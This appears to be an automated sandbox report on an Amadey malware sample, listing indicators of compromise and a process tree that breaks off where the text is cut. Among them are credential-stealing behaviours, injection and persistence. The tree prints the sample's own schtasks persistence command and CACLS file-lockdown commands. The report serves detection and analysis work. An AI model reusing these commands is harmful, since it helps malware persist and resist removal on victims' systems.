amadey | d4cb3f4a5554ec5411cc328cffb5ee564a2114446cbd2c9b27dd5125b15b30b4

pid	Process
1880	attrib.exe
5368	attrib.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/5696-346-0x0000000000830000-0x0000000001E54000-memory.dmp	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x0008000000022e37-242.dat	vmprotect
behavioral1/files/0x0008000000022e37-243.dat	vmprotect
behavioral1/memory/3356-244-0x0000000140000000-0x0000000140622000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	nbveek.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	leman.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	Player3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	vlc-3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	build.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	d4cb3f4a5554ec5411cc328cffb5ee564a2114446cbd2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	nbveek.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	wj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	nbveek.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\B.hta	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A.vbs	powershell.exe

Loads dropped DLL 10 IoCs

pid	Process
3756	rundll32.exe
5004	rundll32.exe
5476	rundll32.exe
1408	rundll32.exe
1660	build.exe
1660	build.exe
5356	rundll32.exe
5356	rundll32.exe
2256	rundll32.exe
3904	rundll32.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\portu.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000001051\\portu.exe"	nbveek.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\portu1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000003051\\portu1.exe"	nbveek.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Detected potential entity reuse from brand microsoft.
phishing microsoft

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
5212	AppLaunch.exe
5212	AppLaunch.exe
5212	AppLaunch.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 2988 set thread context of 4016	2988	nbveek.exe	96
PID 2988 set thread context of 2360	2988	nbveek.exe	98
PID 2988 set thread context of 4492	2988	nbveek.exe	100
PID 1388 set thread context of 5228	1388	Guf.exe	164
PID 5904 set thread context of 5212	5904	bg77.exe	181
PID 5680 set thread context of 2428	5680	Facebook_Tool_vip.exe	218
PID 3532 set thread context of 204	3532	powershell.exe	227

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
4592	3756	WerFault.exe	144
4636	4032	WerFault.exe	97
2428	2360	WerFault.exe	98
5340	4336	WerFault.exe	108
5816	1408	WerFault.exe	199
1528	5004	WerFault.exe	195
3992	3904	WerFault.exe	220

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build.exe

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
5512	schtasks.exe
4632	schtasks.exe
4868	schtasks.exe
3200	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4048	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	109	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5696	adwcleaner.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4536	portu.exe
4536	portu.exe
4520	msedge.exe
4520	msedge.exe
1788	msedge.exe
1788	msedge.exe
5056	anon.exe
5056	anon.exe
5056	anon.exe
2500	taskmgr.exe
2500	taskmgr.exe
4032	portu1.exe
4032	portu1.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2360	nbveek.exe
2360	nbveek.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
4032	portu1.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2360	nbveek.exe
4336	portu1.exe
4336	portu1.exe
4660	40K.exe
4660	40K.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
4660	40K.exe
5176	chrome.exe
5176	chrome.exe
2500	taskmgr.exe
2500	taskmgr.exe
4360	chrome.exe
4360	chrome.exe
2500	taskmgr.exe
4336	portu1.exe
4336	portu1.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
6016	chrome.exe
6016	chrome.exe
6044	chrome.exe
6044	chrome.exe
5872	powershell.exe
5872	powershell.exe
2500	taskmgr.exe
2500	taskmgr.exe
5872	powershell.exe
2500	taskmgr.exe
2500	taskmgr.exe
5228	InstallUtil.exe
5228	InstallUtil.exe
2500	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5696	adwcleaner.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
1788	msedge.exe
1788	msedge.exe
1788	msedge.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	4536	portu.exe
Token: SeDebugPrivilege	4032	portu1.exe
Token: SeDebugPrivilege	5056	anon.exe
Token: SeDebugPrivilege	2360	nbveek.exe
Token: SeDebugPrivilege	4336	portu1.exe
Token: SeDebugPrivilege	2500	taskmgr.exe
Token: SeSystemProfilePrivilege	2500	taskmgr.exe
Token: SeCreateGlobalPrivilege	2500	taskmgr.exe
Token: SeDebugPrivilege	4660	40K.exe
Token: SeDebugPrivilege	5872	powershell.exe
Token: SeDebugPrivilege	5228	InstallUtil.exe
Token: SeDebugPrivilege	2428	Facebook_Tool_vip.exe
Token: SeBackupPrivilege	5696	adwcleaner.exe
Token: SeRestorePrivilege	5696	adwcleaner.exe
Token: SeTakeOwnershipPrivilege	5696	adwcleaner.exe
Token: SeBackupPrivilege	5696	adwcleaner.exe
Token: SeRestorePrivilege	5696	adwcleaner.exe
Token: SeDebugPrivilege	3532	powershell.exe
Token: SeDebugPrivilege	5684	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1788	msedge.exe
1788	msedge.exe
1788	msedge.exe
1788	msedge.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
2500	taskmgr.exe
4360	chrome.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
4360	chrome.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe
2500	taskmgr.exe

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
5696	adwcleaner.exe
5696	adwcleaner.exe
5696	adwcleaner.exe
5696	adwcleaner.exe
5696	adwcleaner.exe
5696	adwcleaner.exe
5696	adwcleaner.exe
5696	adwcleaner.exe
5696	adwcleaner.exe
5696	adwcleaner.exe
5696	adwcleaner.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2376 wrote to memory of 2988	2376	d4cb3f4a5554ec5411cc328cffb5ee564a2114446cbd2.exe	81
PID 2376 wrote to memory of 2988	2376	d4cb3f4a5554ec5411cc328cffb5ee564a2114446cbd2.exe	81
PID 2376 wrote to memory of 2988	2376	d4cb3f4a5554ec5411cc328cffb5ee564a2114446cbd2.exe	81
PID 2988 wrote to memory of 4632	2988	nbveek.exe	82
PID 2988 wrote to memory of 4632	2988	nbveek.exe	82
PID 2988 wrote to memory of 4632	2988	nbveek.exe	82
PID 2988 wrote to memory of 4772	2988	nbveek.exe	84
PID 2988 wrote to memory of 4772	2988	nbveek.exe	84
PID 2988 wrote to memory of 4772	2988	nbveek.exe	84
PID 4772 wrote to memory of 4544	4772	cmd.exe	86
PID 4772 wrote to memory of 4544	4772	cmd.exe	86
PID 4772 wrote to memory of 4544	4772	cmd.exe	86
PID 4772 wrote to memory of 4672	4772	cmd.exe	87
PID 4772 wrote to memory of 4672	4772	cmd.exe	87
PID 4772 wrote to memory of 4672	4772	cmd.exe	87
PID 4772 wrote to memory of 5008	4772	cmd.exe	88
PID 4772 wrote to memory of 5008	4772	cmd.exe	88
PID 4772 wrote to memory of 5008	4772	cmd.exe	88
PID 4772 wrote to memory of 3416	4772	cmd.exe	89
PID 4772 wrote to memory of 3416	4772	cmd.exe	89
PID 4772 wrote to memory of 3416	4772	cmd.exe	89
PID 4772 wrote to memory of 3332	4772	cmd.exe	90
PID 4772 wrote to memory of 3332	4772	cmd.exe	90
PID 4772 wrote to memory of 3332	4772	cmd.exe	90
PID 4772 wrote to memory of 4828	4772	cmd.exe	91
PID 4772 wrote to memory of 4828	4772	cmd.exe	91
PID 4772 wrote to memory of 4828	4772	cmd.exe	91
PID 2988 wrote to memory of 4536	2988	nbveek.exe	92
PID 2988 wrote to memory of 4536	2988	nbveek.exe	92
PID 2988 wrote to memory of 4536	2988	nbveek.exe	92
PID 2988 wrote to memory of 4332	2988	nbveek.exe	93
PID 2988 wrote to memory of 4332	2988	nbveek.exe	93
PID 2988 wrote to memory of 4332	2988	nbveek.exe	93
PID 2988 wrote to memory of 4016	2988	nbveek.exe	96
PID 2988 wrote to memory of 4016	2988	nbveek.exe	96
PID 2988 wrote to memory of 4016	2988	nbveek.exe	96
PID 2988 wrote to memory of 4016	2988	nbveek.exe	96
PID 2988 wrote to memory of 4016	2988	nbveek.exe	96
PID 2988 wrote to memory of 4016	2988	nbveek.exe	96
PID 2988 wrote to memory of 4016	2988	nbveek.exe	96
PID 2988 wrote to memory of 4016	2988	nbveek.exe	96
PID 2988 wrote to memory of 4032	2988	nbveek.exe	97
PID 2988 wrote to memory of 4032	2988	nbveek.exe	97
PID 2988 wrote to memory of 4032	2988	nbveek.exe	97
PID 2988 wrote to memory of 2360	2988	nbveek.exe	98
PID 2988 wrote to memory of 2360	2988	nbveek.exe	98
PID 2988 wrote to memory of 2360	2988	nbveek.exe	98
PID 2988 wrote to memory of 2360	2988	nbveek.exe	98
PID 2988 wrote to memory of 2360	2988	nbveek.exe	98
PID 2988 wrote to memory of 2360	2988	nbveek.exe	98
PID 2988 wrote to memory of 2360	2988	nbveek.exe	98
PID 2988 wrote to memory of 2360	2988	nbveek.exe	98
PID 2988 wrote to memory of 2360	2988	nbveek.exe	98
PID 2988 wrote to memory of 5056	2988	nbveek.exe	99
PID 2988 wrote to memory of 5056	2988	nbveek.exe	99
PID 2988 wrote to memory of 5056	2988	nbveek.exe	99
PID 2988 wrote to memory of 4492	2988	nbveek.exe	100
PID 2988 wrote to memory of 4492	2988	nbveek.exe	100
PID 2988 wrote to memory of 4492	2988	nbveek.exe	100
PID 2988 wrote to memory of 4492	2988	nbveek.exe	100
PID 2988 wrote to memory of 4492	2988	nbveek.exe	100
PID 2988 wrote to memory of 4492	2988	nbveek.exe	100
PID 2988 wrote to memory of 4492	2988	nbveek.exe	100
PID 2988 wrote to memory of 4492	2988	nbveek.exe	100

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

pid	Process
1880	attrib.exe
5368	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	rundll32.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe

C:\Users\Admin\AppData\Local\Temp\d4cb3f4a5554ec5411cc328cffb5ee564a2114446cbd2.exe
"C:\Users\Admin\AppData\Local\Temp\d4cb3f4a5554ec5411cc328cffb5ee564a2114446cbd2.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2376
- C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
  "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2988
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:4632
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\588b4b1c98" /P "Admin:N"&&CACLS "..\588b4b1c98" /P "Admin:R" /E&&Exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4772
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:4544
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "nbveek.exe" /P "Admin:N"
      4⤵
      PID:4672
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "nbveek.exe" /P "Admin:R" /E
      4⤵
      PID:5008
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:3416
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\588b4b1c98" /P "Admin:N"
      4⤵
      PID:3332
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\588b4b1c98" /P "Admin:R" /E
      4⤵
      PID:4828
- - C:\Users\Admin\AppData\Local\Temp\1000001051\portu.exe
    "C:\Users\Admin\AppData\Local\Temp\1000001051\portu.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4536
- - C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
    "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe"
    3⤵
    PID:4332
- - C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
    "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe"
    3⤵
    - Executes dropped EXE
    PID:4016
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
      4⤵
      Adds Run key to start application
      Enumerates system info in registry
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:1788
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffa687246f8,0x7ffa68724708,0x7ffa68724718
        5⤵
        
        PID:2272
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,195285305158153279,4104189012458036218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
        5⤵
        
        PID:1492
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,195285305158153279,4104189012458036218,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4520
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,195285305158153279,4104189012458036218,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8
        5⤵
        
        PID:2768
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,195285305158153279,4104189012458036218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
        5⤵
        
        PID:4640
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,195285305158153279,4104189012458036218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
        5⤵
        
        PID:4692
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2120,195285305158153279,4104189012458036218,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3860 /prefetch:8
        5⤵
        
        PID:1812
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,195285305158153279,4104189012458036218,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1
        5⤵
        
        PID:3756
- - C:\Users\Admin\AppData\Local\Temp\1000003051\portu1.exe
    "C:\Users\Admin\AppData\Local\Temp\1000003051\portu1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4032
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 1224
      4⤵
      Program crash
      PID:4636
- - C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
    "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2360
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 1208
      4⤵
      Program crash
      PID:2428
- - C:\Users\Admin\AppData\Local\Temp\1000006001\anon.exe
    "C:\Users\Admin\AppData\Local\Temp\1000006001\anon.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5056
- - C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe
    "C:\Users\Admin\AppData\Local\Temp\588b4b1c98\nbveek.exe"
    3⤵
    - Executes dropped EXE
    PID:4492
- - C:\Users\Admin\AppData\Local\Temp\1000012001\leman.exe
    "C:\Users\Admin\AppData\Local\Temp\1000012001\leman.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    PID:4968
  - - C:\Users\Admin\AppData\Local\Temp\d003af69b2\nbveek.exe
      "C:\Users\Admin\AppData\Local\Temp\d003af69b2\nbveek.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      PID:1436
    - - C:\Windows\SysWOW64\schtasks.exe
        
